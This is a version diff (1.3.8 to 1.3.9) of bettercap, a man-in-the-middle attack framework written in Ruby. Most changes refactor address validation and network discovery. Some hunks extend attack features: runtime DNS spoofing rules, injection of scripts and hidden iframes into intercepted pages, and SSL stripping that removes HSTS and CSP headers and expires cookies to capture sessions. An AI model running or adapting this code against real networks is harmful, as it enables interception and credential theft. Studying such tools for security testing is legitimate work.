bettercap 1.3.8 → 1.3.9

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 97b1b49dc607820e776704bce9ca73d9bcb55b0b
-  data.tar.gz: 194f31c34fecf4695f9b7a5728cebcab3a1bc0f2
+  metadata.gz: 04fcfc9b8b34c69b44236a52f322bd0e9dc42e68
+  data.tar.gz: a37d61a2d587eedc1e4682ee4c885629db12bd86
 SHA512:
-  metadata.gz: f2eff4d44d1e1db62e406de421c458c97e9a8cba55d554ad2465d7cb019b488f8e961f8e5a304865c8e9a390df343cddb32d87585a99979d1279d4a832cc1498
-  data.tar.gz: 24249e328e6ffb0a082d7058d0aacdaa6c75fdec75e820274d266f0f41a6686c781b4a91141fa52aa2bf9b6a1caf935ec6b5880ec42b6f4f7c95dd2087d078d5
+  metadata.gz: 33c42e7fee3330128513900d7ad5bbb6058adae66177fd75516d164cdd18d78ca6d9cacf928b071dd16b1781ca9de93f90a58442911cf4aea0b6ad64fc5206b3
+  data.tar.gz: 77d9f295dcf9e390bfdaabbb20c972bdf2768b1edf4a443aaea0845b525c2d1f203ed68acc210b87ef59729873e3bd36cdb4ed03f1bd2f73cb7bc0f0426933f1

data/lib/bettercap/context.rb

@@ -93,7 +93,7 @@ class Context
     raise BetterCap::Error, "Could not detect the gateway address for interface #{@options.iface}, "\
                             'make sure you\'ve specified the correct network interface to use and to have the '\
                             'correct network configuration, this could also happen if bettercap '\
-                            'is launched from a virtual environment.' if @gateway.nil? or !Network.is_ip?(@gateway)
+                            'is launched from a virtual environment.' unless Network::Validator.is_ip?(@gateway)
 
     Logger.debug '----- NETWORK INFORMATIONS -----'
     Logger.debug "  network  = #{@ifconfig[:ip4_obj]}"

data/lib/bettercap/discovery/agents/base.rb

@@ -18,18 +18,26 @@ module Agents
 # Base class for BetterCap::Discovery::Agents.
 class Base
   # Initialize the agent using the +ctx+ BetterCap::Context instance.
-  def initialize( ctx )
+  # If +address+ is not nil only that ip will be probed.
+  def initialize( ctx, address = nil )
     @ctx       = ctx
     @ifconfig  = ctx.ifconfig
     @local_ip  = @ifconfig[:ip_saddr]
-
-    net = ip = @ifconfig[:ip4_obj]
-    # loop each ip in our subnet and push it to the queue
-    while net.include?ip
-      unless skip_address?(ip)
-        @ctx.packets.push( get_probe(ip) )
+    @address   = address
+
+    if @address.nil?
+      net = ip = @ifconfig[:ip4_obj]
+      # loop each ip in our subnet and push it to the queue
+      while net.include?ip
+        unless skip_address?(ip)
+          @ctx.packets.push( get_probe(ip) )
+        end
+        ip = ip.succ
+      end
+    else
+      unless skip_address?(@address)
+        @ctx.packets.push( get_probe(@address) )
       end
-      ip = ip.succ
     end
   end
 

data/lib/bettercap/discovery/agents/icmp.rb

@@ -19,7 +19,7 @@ module Agents
 class Icmp
   # Create a thread which will perform a ping-sweep on the network in order
   # to populate the ARP cache with active targets.
-  def initialize( ctx )
+  def initialize( ctx, address = nil )
     Firewalls::Base.get.enable_icmp_bcast(true)
 
     # TODO: Use the real broadcast address for this network.

data/lib/bettercap/network/network.rb

@@ -16,37 +16,19 @@ module BetterCap
 # Handles various network related tasks.
 module Network
 class << self
-  # Return true if +ip+ is a valid IP address, otherwise false.
-  def is_ip?(ip)
-    if /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\Z/ =~ ip.to_s
-      return $~.captures.all? {|i| i.to_i < 256}
-    end
-    false
-  end
-
-  # Return true if +mac+ is a valid MAC address, otherwise false.
-  def is_mac?(mac)
-    ( /^[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}$/i =~ mac.to_s )
-  end
-
   # Return the current network gateway or nil.
   def get_gateway
     nstat = Shell.execute('netstat -nr')
+    iface = Context.get.options.iface
 
     Logger.debug "NETSTAT:\n#{nstat}"
 
-    out = nstat.split(/\n/).select {|n| n =~ /UG/ }
-    gw  = nil
-    out.each do |line|
-      if line.include?( Context.get.options.iface )
-        tmp = line.split[1]
-        if is_ip?(tmp)
-          gw = tmp
-          break
-        end
+    nstat.split(/\n/).select {|n| n =~ /UG/ }.each do |line|
+      Network::Validator.each_ip(line) do |address|
+        return address
       end
     end
-    gw
+    nil
   end
 
   # Return a list of IP addresses associated to this device network interfaces.
@@ -95,72 +77,27 @@ class << self
 
   # Return the hardware address associated with the specified +ip_address+ using
   # the +iface+ network interface.
-  # The resolution will be performed for the specified number of +attempts+.
-  def get_hw_address( iface, ip_address, attempts = 2 )
-    hw_address = ArpReader.find_address( ip_address )
-
-    if hw_address.nil?
-      attempts.times do
-        arp_pkt = PacketFu::ARPPacket.new
-
-        arp_pkt.eth_saddr     = arp_pkt.arp_saddr_mac = iface[:eth_saddr]
-        arp_pkt.eth_daddr     = 'ff:ff:ff:ff:ff:ff'
-        arp_pkt.arp_daddr_mac = '00:00:00:00:00:00'
-        arp_pkt.arp_saddr_ip  = iface[:ip_saddr]
-        arp_pkt.arp_daddr_ip  = ip_address
-
-        cap_thread = Thread.new do
-          Context.get.packets.push(arp_pkt)
-
-          target_mac = nil
-          timeout = 0
-
-          cap = PacketFu::Capture.new(
-            iface: iface[:iface],
-            start: true,
-            filter: "arp src #{ip_address} and ether dst #{arp_pkt.eth_saddr}"
-          )
-
-          begin
-            Logger.debug 'Attempting to get MAC from packet capture ...'
-            target_mac = Timeout::timeout(0.5) { get_mac_from_capture(cap, ip_address) }
-          rescue Timeout::Error
-            timeout += 0.1
-            retry if target_mac.nil? && timeout <= 5
-          end
-
-          target_mac
-        end
-        hw_address = cap_thread.value
-
-        break unless hw_address.nil?
-      end
+  def get_hw_address( ctx, ip )
+    hw = ArpReader.find_address( ip )
+    if hw.nil?
+      start_agents( ctx, ip )
+      hw = ArpReader.find_address( ip )
     end
-
-    hw_address
+    hw
   end
 
   private
 
   # Start discovery agents and wait for +ctx.timeout+ seconds for them to
   # complete their job.
-  def start_agents( ctx )
+  # If +address+ is not nil only that ip will be probed.
+  def start_agents( ctx, address = nil )
     [ 'Icmp', 'Udp', 'Arp' ].each do |name|
-      BetterCap::Loader.load("BetterCap::Discovery::Agents::#{name}").new(ctx)
+      BetterCap::Loader.load("BetterCap::Discovery::Agents::#{name}").new(ctx, address)
     end
     ctx.packets.wait_empty( ctx.timeout )
   end
-
-  # Search for the MAC address associated to +ip_address+ inside the +cap+
-  # PacketFu::Capture object.
-  def get_mac_from_capture( cap, ip_address )
-    cap.stream.each do |p|
-      arp_response = PacketFu::Packet.parse(p)
-      target_mac = arp_response.arp_saddr_mac if arp_response.arp_saddr_ip == ip_address
-      break target_mac unless target_mac.nil?
-    end
-  end
-
 end
+
 end
 end

data/lib/bettercap/network/packet_queue.rb

@@ -63,7 +63,7 @@ class PacketQueue
   def dispatch_udp_packet(packet)
     ip, port, data = packet
     @mutex.synchronize {
-      Logger.debug "Sending UDP data packet to #{ip}:#{port} ..."
+      # Logger.debug "Sending UDP data packet to #{ip}:#{port} ..."
       @udp.send( data, 0, ip, port )
     }
   end
@@ -71,7 +71,7 @@ class PacketQueue
   # Use the global Pcap injection instance to send the +packet+.
   def dispatch_raw_packet(packet)
     @mutex.synchronize {
-      Logger.debug "Sending #{packet.class.name} packet ..."
+      # Logger.debug "Sending #{packet.class.name} packet ..."
       @stream.inject( packet.headers[0].to_s )
     }
   end

data/lib/bettercap/network/servers/dnsd.rb

@@ -18,10 +18,21 @@ module Servers
 
 # Class to wrap RubyDNS::RuleBasedServer and add some utility methods.
 class DnsWrapper < RubyDNS::RuleBasedServer
+  # List of redirection rules.
+  attr_accessor :rules
+  # we need this in order to add rules at runtime.
+  @@instance = nil
+
+  # Return the active instance of this object.
+  def self.get
+    @@instance
+  end
+
   # Instantiate a server with a block.
   def initialize(options = {}, &block)
     super(options,&block)
     @rules = options[:rules]
+    @@instance = self
   end
   # Give a name and a record type, try to match a rule and use it for processing the given arguments.
   def process(name, resource_class, transaction)
@@ -35,7 +46,7 @@ class DNSD
   # Initialize the DNS server with the specified +address+ and tcp/udp +port+.
   # The server will load +hosts_filename+ composed by 'regexp -> ip' entries
   # to do custom DNS spoofing/resolution.
-  def initialize( hosts_filename, address = '0.0.0.0', port = 5300 )
+  def initialize( hosts_filename = nil, address = '0.0.0.0', port = 5300 )
     @port    = port
     @address = address
     @server  = nil
@@ -46,16 +57,29 @@ class DNSD
       [:tcp, address, port]
     ]
 
-    DNSD.parse_hosts( hosts_filename ).each do |exp,addr|
-      block = Proc.new do |transaction|
-        Logger.info "[#{transaction.options[:peer]} > #{'DNS'.green}] Received request for '#{transaction.question.to_s.yellow}', sending spoofed reply #{addr.yellow} ..."
-        transaction.respond!(addr)
+    unless hosts_filename.nil?
+      DNSD.parse_hosts( hosts_filename ).each do |exp,addr|
+        block = Proc.new do |transaction|
+          Logger.info "[#{transaction.options[:peer]} > #{'DNS'.green}] Received request for '#{transaction.question.to_s.yellow}', sending spoofed reply #{addr.yellow} ..."
+          transaction.respond!(addr)
+        end
+
+        @rules << RubyDNS::RuleBasedServer::Rule.new( [ exp, Resolv::DNS::Resource::IN::A ], block )
       end
 
-      @rules << RubyDNS::RuleBasedServer::Rule.new( [ exp, Resolv::DNS::Resource::IN::A ], block )
+      Logger.warn "Empty hosts file for DNS server." if @rules.empty?
+    end
+  end
+
+  # Add a rule to the DNS resolver at runtime.
+  def add_rule( exp, addr )
+    Logger.debug "[#{'DNS'.green}] Adding rule: '#{exp}' -> '#{addr}' ..."
+    block = Proc.new do |transaction|
+      Logger.info "[#{transaction.options[:peer]} > #{'DNS'.green}] Received request for '#{transaction.question.to_s.yellow}', sending spoofed reply #{addr.yellow} ..."
+      transaction.respond!(addr)
     end
 
-    Logger.warn "Empty hosts file for DNS server." if @rules.empty?
+    DnsWrapper.get.rules << RubyDNS::RuleBasedServer::Rule.new( [ Regexp.new(exp), Resolv::DNS::Resource::IN::A ], block )
   end
 
   # Start the server.
@@ -63,7 +87,14 @@ class DNSD
     Logger.info "[#{'DNS'.green}] Starting on #{@address}:#{@port} ( #{@rules.size} redirection rule#{if @rules.size > 1 then 's' else '' end} ) ..."
 
     @thread = Thread.new {
-      RubyDNS::run_server(:listen => @ifaces, :asynchronous => true, :server_class => DnsWrapper, :rules => @rules ) do
+      options = {
+        :listen => @ifaces,
+        :asynchronous => true,
+        :server_class => DnsWrapper,
+        :rules => @rules
+      }
+
+      RubyDNS::run_server( options ) do
         # Suppress RubyDNS logging.
         @logger.level = ::Logger::ERROR
         @upstream ||= RubyDNS::Resolver.new([[:udp, "8.8.8.8", 53], [:tcp, "8.8.8.8", 53]])
@@ -108,7 +139,8 @@ class DNSD
           address = Context.get.ifconfig[:ip_saddr].to_s
         end
 
-        raise BetterCap::Error, "Invalid IPv4 address '#{address}' on line #{lineno + 1} of '#{filename}'." unless Network.is_ip?(address)
+        raise BetterCap::Error, "Invalid IPv4 address '#{address}' on line #{lineno + 1} of '#{filename}'." \
+          unless Network::Validator.is_ip?(address)
 
         begin
           hosts[ Regexp.new(expression) ] = address

data/lib/bettercap/network/target.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/logger'
 require 'socket'
 
 module BetterCap
@@ -45,13 +44,15 @@ class Target
   # ip address will be parsed from the computer ARP cache and updated
   # accordingly.
   def initialize( ip, mac=nil )
-    if Network.is_ip?(ip)
-      @ip = ip
+    if Network::Validator.is_ip?(ip)
+      @ip         = ip
       @ip_refresh = false
-    else
+    elsif Network::Validator.is_mac?(ip)
       @ip         = nil
       mac         = ip
       @ip_refresh = true
+    else
+      raise BetterCap::Error, "'#{ip}' is not a valid IP or MAC address."
     end
 
     @mac      = Target.normalized_mac(mac) unless mac.nil?

data/lib/bettercap/network/validator.rb

@@ -0,0 +1,87 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+module BetterCap
+module Network
+# Simple class to perform validation of various addresses, ranges, etc.
+class Validator
+  # Basic expression to validate an IP address.
+  IP_ADDRESS_REGEX = '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})'
+  # Quite self explainatory :)
+  IP_OCTECT_MAX    = 255
+
+  # Return true if +ip+ is a valid IP address, otherwise false.
+  def self.is_ip?(ip)
+    if /\A#{IP_ADDRESS_REGEX}\Z/ =~ ip.to_s
+      return $~.captures.all? { |i| i.to_i <= IP_OCTECT_MAX }
+    end
+    false
+  end
+
+  # Extract valid IP addresses from +data+ and yields each one of them.
+  def self.each_ip(data)
+    data.scan(/(#{IP_ADDRESS_REGEX})/).each do |m|
+      yield( m[0] ) if m[0] != '0.0.0.0'
+    end
+  end
+
+  # Return true if +r+ is a valid IP address range ( 192.168.1.1-93 ), otherwise false.
+  def self.is_range?(r)
+    if /\A#{IP_ADDRESS_REGEX}\-(\d{1,3})\Z/ =~ r.to_s
+      return $~.captures.all? { |i| i.to_i <= IP_OCTECT_MAX }
+    end
+    false
+  end
+
+  # Parse +r+ as an IP range and return the first and last IP.
+  def self.parse_range(r)
+    first, last_part = r.split('-')
+    last = first.split('.')[0..2].join('.') + ".#{last_part}"
+    first = IPAddr.new(first)
+    last  = IPAddr.new(last)
+
+    [ first, last ]
+  end
+
+  # Parse +r+ as an IP range and yields each address in it.
+  def self.each_in_range(r)
+    first, last = self.parse_range(r)
+    loop do
+      yield first.to_s
+      break if first == last
+      first = first.succ
+    end
+  end
+
+  # Parse +m+ as a netmask and yields each address in it.
+  def self.each_in_netmask(m)
+    IPAddr.new(m).to_range.each do |o|
+       yield o.to_s
+    end
+  end
+
+  # Return true if +n+ is a valid IP netmask range ( 192.168.1.1/24 ), otherwise false.
+  def self.is_netmask?(n)
+    if /\A#{IP_ADDRESS_REGEX}\/(\d+)\Z/ =~ n.to_s
+      return $~.captures.all? { |i| i.to_i <= IP_OCTECT_MAX }
+    end
+    false
+  end
+
+  # Return true if +mac+ is a valid MAC address, otherwise false.
+  def self.is_mac?(mac)
+    ( /^[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}\:[a-f0-9]{1,2}$/i =~ mac.to_s )
+  end
+end
+
+end
+end

data/lib/bettercap/options.rb

@@ -367,8 +367,13 @@ class Options
 
     ctx.options.starting_message
 
+    if ctx.options.sslstrip and ctx.options.dnsd
+      raise BetterCap::Error, "SSL Stripping and builtin DNS server are mutually exclusive features, " \
+                              "either use the --no-sslstrip option or remove the --dns option."
+    end
+
     unless ctx.options.gateway.nil?
-      raise BetterCap::Error, "The specified gateway '#{ctx.options.gateway}' is not a valid IPv4 address." unless Network.is_ip?(ctx.options.gateway)
+      raise BetterCap::Error, "The specified gateway '#{ctx.options.gateway}' is not a valid IPv4 address." unless Network::Validator.is_ip?(ctx.options.gateway)
       ctx.gateway = ctx.options.gateway
       Logger.debug("Targetting manually specified gateway #{ctx.gateway}")
     end
@@ -418,7 +423,7 @@ class Options
   # or more invalid IP addresses are specified.
   def parse_ignore!(value)
     @ignore = value.split(",")
-    valid = @ignore.select { |target| Network.is_ip?(target) }
+    valid = @ignore.select { |target| Network::Validator.is_ip?(target) }
 
     raise BetterCap::Error, "Invalid ignore addresses specified." if valid.empty?
 
@@ -435,7 +440,7 @@ class Options
   # Setter for the #custom_proxy or #custom_https_proxy attribute, will raise a
   # BetterCap::Error if +value+ is not a valid IP address.
   def parse_custom_proxy!(value, https=false)
-    raise BetterCap::Error, 'Invalid custom HTTP upstream proxy address specified.' unless Network.is_ip?(value)
+    raise BetterCap::Error, 'Invalid custom HTTP upstream proxy address specified.' unless Network::Validator.is_ip?(value)
     if https
       @custom_proxy = value
     else
@@ -460,25 +465,37 @@ class Options
   # Split specified targets and parse them ( either as IP or MAC ), will raise a
   # BetterCap::Error if one or more invalid addresses are specified.
   def parse_targets
+    valid   = []
     targets = @target.split(",")
-    valid_targets = targets.select { |target| Network.is_ip?(target) or Network.is_mac?(target) }
 
-    raise BetterCap::Error, "Invalid target specified." if valid_targets.empty?
+    targets.each do |t|
+      if Network::Validator.is_ip?(t) or Network::Validator.is_mac?(t)
+        valid << Network::Target.new(t)
+
+      elsif Network::Validator.is_range?(t)
+        Network::Validator.each_in_range( t ) do |address|
+          valid << Network::Target.new(address)
+        end
 
-    invalid_targets = targets - valid_targets
-    invalid_targets.each do |target|
-      Logger.warn "Invalid target specified: #{target}"
+      elsif Network::Validator.is_netmask?(t)
+        Network::Validator.each_in_netmask(t) do |address|
+          valid << Network::Target.new(address)
+        end
+
+      else
+        raise BetterCap::Error, "Invalid target specified '#{t}', valid formats are IP addresses, "\
+                                "MAC addresses, IP ranges ( 192.168.1.1-30 ) or netmasks ( 192.168.1.1/24 ) ."
+      end
     end
 
-    valid_targets.map { |target| Network::Target.new(target) }
+    valid
   end
 
   # Parse spoofers and return a list of BetterCap::Spoofers objects. Raise a
   # BetterCap::Error if an invalid spoofer name was specified.
   def parse_spoofers
     spoofers = []
-    spoofer_modules_names = @spoofer.split(",")
-    spoofer_modules_names.each do |module_name|
+    @spoofer.split(",").each do |module_name|
       spoofers << Spoofers::Base.get_by_name( module_name )
     end
     spoofers

data/lib/bettercap/proxy/modules/injectcss.rb

@@ -56,7 +56,7 @@ class InjectCSS < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "[#{'INJECTCSS'.green}] Injecting CSS #{if @@cssdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTCSS'.green}] Injecting CSS #{if @@cssdata.nil? then "URL" else "file" end} into #{request.to_url}"
       # inject URL
       if @@cssdata.nil?
         response.body.sub!( '</head>', "  <link rel=\"stylesheet\" href=\"#{@cssurl}\"></script></head>" )

data/lib/bettercap/proxy/modules/injecthtml.rb

@@ -44,7 +44,7 @@ class InjectHTML < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "[#{'INJECTHTML'.green}] Injecting HTML code into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTHTML'.green}] Injecting HTML code into #{request.to_url}"
 
       if @@data.nil?
         response.body.sub!( '</body>', "<iframe src=\"#{@@iframe}\" frameborder=\"0\" height=\"0\" width=\"0\"></iframe></body>" )

data/lib/bettercap/proxy/modules/injectjs.rb

@@ -56,7 +56,7 @@ class InjectJS < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "[#{'INJECTJS'.green}] Injecting javascript #{if @@jsdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTJS'.green}] Injecting javascript #{if @@jsdata.nil? then "URL" else "file" end} into #{request.to_url}"
       # inject URL
       if @@jsdata.nil?
         response.body.sub!( '</head>', "<script src=\"#{@@jsurl}\" type=\"text/javascript\"></script></head>" )

data/lib/bettercap/proxy/proxy.rb

@@ -45,8 +45,13 @@ class Proxy
 
     BasicSocket.do_not_reverse_lookup = true
 
-    @pool = ThreadPool.new( 4, 16 ) do |client|
+    @pool = ThreadPool.new( 4, 64 ) do |client|
+      begin
        client_worker client
+      rescue Exception => e
+        Logger.warn "Client worker errort: #{e.message}"
+        Logger.exception e
+      end
     end
   end
 
@@ -98,6 +103,9 @@ class Proxy
     while @running do
       begin
         @pool << @server.accept
+      rescue OpenSSL::SSL::SSLError => se
+        Logger.debug("Error while accepting #{@type} connection.")
+        Logger.exception(se)
       rescue Exception => e
         Logger.warn("Error while accepting #{@type} connection: #{e.inspect}") if @running
       end
@@ -109,7 +117,10 @@ class Proxy
   # Return true if the +request+ host header contains one of this computer
   # ip addresses.
   def is_self_request?(request)
-    @local_ips.include? IPSocket.getaddress(request.host)
+    begin
+      return @local_ips.include? IPSocket.getaddress(request.host)
+    rescue; end
+    false
   end
 
   # Handle a new +client+.
@@ -121,12 +132,14 @@ class Proxy
 
       request.read(client)
 
+      Logger.debug 'Request parsed.'
+
       # stripped request
       if @streamer.was_stripped?( request, client )
         @streamer.handle( request, client )
       # someone is having fun with us =)
       elsif is_self_request? request
-        @streamer.rickroll( client, @is_https )
+        @streamer.rickroll( client )
       # handle request
       else
         @streamer.handle( request, client )
@@ -135,10 +148,12 @@ class Proxy
       Logger.debug "#{@type} client served."
 
     rescue SocketError => se
-      Logger.debug "Socket error while serving client: #{e.message}"
-      Logger.exception e
+      Logger.debug "Socket error while serving client: #{se.message}"
+      # Logger.exception se
     rescue Errno::EPIPE => ep
       Logger.debug "Connection closed while serving client."
+    rescue EOFError => eof
+      Logger.debug "EOFError while serving client."
     rescue Exception => e
       Logger.warn "Error while serving client: #{e.message}"
       Logger.exception e

data/lib/bettercap/proxy/request.rb

@@ -15,12 +15,12 @@ module BetterCap
 module Proxy
 # HTTP request parser.
 class Request
-  # Patched request lines.
-  attr_reader :lines
-  # HTTP verb.
-  attr_reader :verb
-  # Request URL.
-  attr_reader :url
+  # HTTP method.
+  attr_reader :method
+  # HTTP version.
+  attr_reader :version
+  # Request path + query.
+  attr_reader :path
   # Hostname.
   attr_reader :host
   # Request port.
@@ -33,21 +33,19 @@ class Request
   attr_accessor :body
   # Client address.
   attr_accessor :client
-  # Client port.
-  attr_accessor :client_port
 
   # Initialize this object setting #port to +default_port+.
   def initialize( default_port = 80 )
-    @lines  = []
-    @verb   = nil
-    @url    = nil
-    @host   = nil
-    @port   = default_port
-    @headers = {}
+    @lines          = []
+    @method         = nil
+    @version        = '1.1'
+    @path           = nil
+    @host           = nil
+    @port           = default_port
+    @headers        = {}
     @content_length = 0
-    @body   = nil
-    @client = ""
-    @client_port = 0
+    @body           = nil
+    @client         = ""
   end
 
   # Read lines from the +sock+ socket and parse them.
@@ -94,64 +92,71 @@ class Request
     Logger.debug "  REQUEST LINE: '#{line}'"
 
     # is this the first line '<VERB> <URI> HTTP/<VERSION>' ?
-    if @url.nil? and line =~ /^(\w+)\s+(\S+)\s+HTTP\/[\d\.]+\s*$/
-      @verb    = $1
-      @url     = $2
+    if line =~ /^(\w+)\s+(\S+)\s+HTTP\/([\d\.]+)\s*$/
+      @method  = $1
+      @path    = $2
+      @version = $3
 
       # fix url
-      if @url.include? '://'
-        uri = URI::parse @url
-        @url = "#{uri.path}" + ( uri.query ? "?#{uri.query}" : '' )
+      if @path.include? '://'
+        uri = URI::parse @path
+        @path = "#{uri.path}" + ( uri.query ? "?#{uri.query}" : '' )
       end
 
-      line = "#{@verb} #{@url} HTTP/1.1"
-    # get the host header value
-    elsif line =~ /^Host:\s*(.*)$/
-      @host = $1
-      if host =~ /([^:]*):([0-9]*)$/
-        @host = $1
-        @port = $2.to_i
+    # collect and fix headers
+    elsif line =~ /^([^:\s]+)\s*:\s*(.+)$/i
+      name = $1
+      value = $2
+
+      case name
+      when 'Host'
+        @host = value
+        if @host =~ /([^:]*):([0-9]*)$/
+          @host = $1
+          @port = $2.to_i
+        end
+      when 'Content-Length'
+        @content_length = value.to_i
+      # we don't want to have hundreds of threads running
+      when 'Connection'
+        value = 'close'
+      when 'Proxy-Connection'
+        name = 'Connection'
+      # disable gzip, chunked, etc encodings
+      when 'Accept-Encoding'
+        value = 'identity'
       end
-    # parse content length, this will speed up data streaming
-    elsif line =~ /^Content-Length:\s+(\d+)\s*$/i
-      @content_length = $1.to_i
-    # we don't want to have hundreds of threads running
-    elsif line =~ /^Connection: keep-alive/i
-      line = 'Connection: close'
-    elsif line =~ /^Proxy-Connection: (.+)/i
-      line = "Connection: #{$1}"
-    # disable gzip, chunked, etc encodings
-    elsif line =~ /^Accept-Encoding:.*/i
-      line = 'Accept-Encoding: identity'
-    end
 
-    # collect headers
-    if line =~ /^([^:\s]+)\s*:\s*(.+)$/i
-      @headers[$1] = $2
+      @headers[name] = value
     end
-
-    @lines << line
   end
 
   # Return true if this is a POST request, otherwise false.
   def post?
-    @verb == 'POST'
+    @method == 'POST'
   end
 
   # Return a string representation of the HTTP request.
   def to_s
-    @lines.join("\n") + "\n" + ( @body || '' )
+    raw = "#{@method} #{@path} HTTP/#{@version}\n"
+
+    @headers.each do |name,value|
+      raw << "#{name}: #{value}\n"
+    end
+
+    raw << "\n"
+    raw << ( @body || '' )
+    raw
   end
 
+  # Return SCHEMA://HOST
   def base_url
-    schema = if port == 443 then 'https' else 'http' end
-    "#{schema}://#{@host}/"
+    "#{port == 443 ? 'https' : 'http'}://#{@host}"
   end
 
   # Return the full request URL trimming it at +max_length+ characters.
   def to_url(max_length = 50)
-    schema = if port == 443 then 'https' else 'http' end
-    url = "#{schema}://#{@host}#{@url}"
+    url = "#{base_url}#{@path}"
     unless max_length.nil?
       url = url.slice(0..max_length) + '...' unless url.length <= max_length
     end
@@ -160,37 +165,23 @@ class Request
 
   # Return the value of header with +name+ or an empty string.
   def [](name)
-    if @headers.include?(name) then @headers[name] else "" end
+    ( @headers.has_key?(name) ? @headers[name] : "" )
   end
 
   # If the header with +name+ is found, then a +value+ is assigned to it.
   # If +value+ is null and the header is found, it will be removed.
   def []=(name, value)
-    found = false
-    @lines.each_with_index do |line,i|
-      if line =~ /^#{name}:\s*.+$/i
-        found = true
-        if value.nil?
-          @headers.delete(name)
-          @lines.delete_at(i)
-        else
-          @headers[name] = value
-          @lines[i] = "#{name}: #{value}"
-        end
-        break
+    if @headers.has_key?(name)
+      if value.nil?
+        @headers.delete(name)
+      else
+        @headers[name] = value
       end
-    end
-
-    if name == 'Host'
-      @host = value
-    end
-
-    if !found and !value.nil?
+    elsif !value.nil?
       @headers[name] = value
-      @lines << "#{name}: #{value}"
     end
 
-    @lines.reject!(&:empty?)
+    @host = value if name == 'Host'
   end
 end
 end

data/lib/bettercap/proxy/response.rb

@@ -155,13 +155,18 @@ class Response
     found = false
     @headers.each_with_index do |header,i|
       if header =~ /^#{name}:\s*.+$/i
-        @headers[i] = "#{name}: #{value}"
+        if value.nil?
+          @headers.delete(i)
+        else
+          @headers[i] = "#{name}: #{value}"
+        end
+
         found = true
         break
       end
     end
 
-    unless found
+    unless found or value.nil?
       @headers << "#{name}: #{value}"
     end
   end

data/lib/bettercap/proxy/sslstrip/strip.rb

@@ -28,7 +28,8 @@ class StrippedObject
   SUBDOMAIN_REPLACES = {
     'www'     => 'wwwww',
     'webmail' => 'wwebmail',
-    'mail'    => 'wmail'
+    'mail'    => 'wmail',
+    'm'       => 'wmobile'
   }.freeze
 
   # Create an instance with the given arguments.
@@ -38,6 +39,16 @@ class StrippedObject
     @stripped = stripped
   end
 
+  # Return the #original hostname.
+  def original_hostname
+    URI::parse(@original).hostname
+  end
+
+  # Return the #stripped hostname.
+  def stripped_hostname
+    URI::parse(@stripped).hostname
+  end
+
   # Return a normalized version of +url+.
   def self.normalize( url, schema = 'https' )
     # add schema if needed
@@ -94,13 +105,15 @@ class Strip
     @stripped = []
     @cookies  = CookieMonitor.new
     @favicon  = Response.from_file( File.dirname(__FILE__) + '/lock.ico', 'image/x-icon' )
+    @resolver = BetterCap::Network::Servers::DNSD.new
+    @resolver.start
   end
 
   # Return true if the +request+ was stripped.
   def was_stripped?(request)
     url = request.base_url
     @stripped.each do |s|
-      if s.client == request.client and s.stripped == url
+      if s.client == request.client and s.stripped.start_with?(url)
         return true
       end
     end
@@ -109,7 +122,7 @@ class Strip
 
   def unstrip( request, url )
     @stripped.each do |s|
-      if s.client == request.client and s.stripped == url
+      if s.client == request.client and s.stripped.start_with?(url)
         return s.original
       end
     end
@@ -140,6 +153,7 @@ class Strip
       return true
     end
 
+    process_headers!(response)
     process_body!( request, response )
 
     # do not retry the request.
@@ -148,13 +162,23 @@ class Strip
 
   private
 
-  # Clean some headers from +request+.
-  def process_headers!(request)
-    request['Accept-Encoding']           = nil
-    request['If-None-Match']             = nil
-    request['If-Modified-Since']         = nil
-    request['Upgrade-Insecure-Requests'] = nil
-    request['Pragma']                    = 'no-cache'
+  # Clean some headers from +r+.
+  def process_headers!(r)
+    # clean request
+    if r.is_a?(BetterCap::Proxy::Request)
+      r['Accept-Encoding']           = nil
+      r['If-None-Match']             = nil
+      r['If-Modified-Since']         = nil
+      r['Upgrade-Insecure-Requests'] = nil
+      r['Pragma']                    = 'no-cache'
+    # clean response
+    else
+      r['X-Frame-Options']           = nil
+      r['X-Content-Type-Options']    = nil
+      r['X-Xss-Protection']          = nil
+      r['Strict-Transport-Security'] = nil
+      r['Content-Security-Policy']   = nil
+    end
   end
 
   # If +request+ has unknown session cookies, create a client redirection
@@ -165,7 +189,7 @@ class Strip
     unless @cookies.is_clean?(request)
       Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending expired cookies for '#{request.host}'."
       expired = @cookies.get_expired_headers!(request)
-      response = Response.redirect( "http://#{request.host}#{request.url}", expired )
+      response = Response.redirect( request.to_url(nil), expired )
     end
     response
   end
@@ -179,7 +203,7 @@ class Strip
       # i.e: http://wwww.facebook.com/
       url        = StrippedObject.normalize( stripped, 'http' )
       # i.e: www.facebook.com
-      unstripped = unstrip( request, url ).gsub( 'https://', '' ).gsub('/', '' )
+      unstripped = unstrip( request, url ).gsub( 'https://', '' ).gsub( 'http://', '' ).gsub( /\/.*/, '' )
 
       # loop each header and fix the stripped url if needed,
       # this will fix headers such as Host, Referer, Origin, etc.
@@ -205,7 +229,7 @@ class Strip
 
   # Return true if +request+ is a favicon request.
   def is_favicon?(request)
-    ( request.url.include?('.ico') or request.url.include?('favicon') )
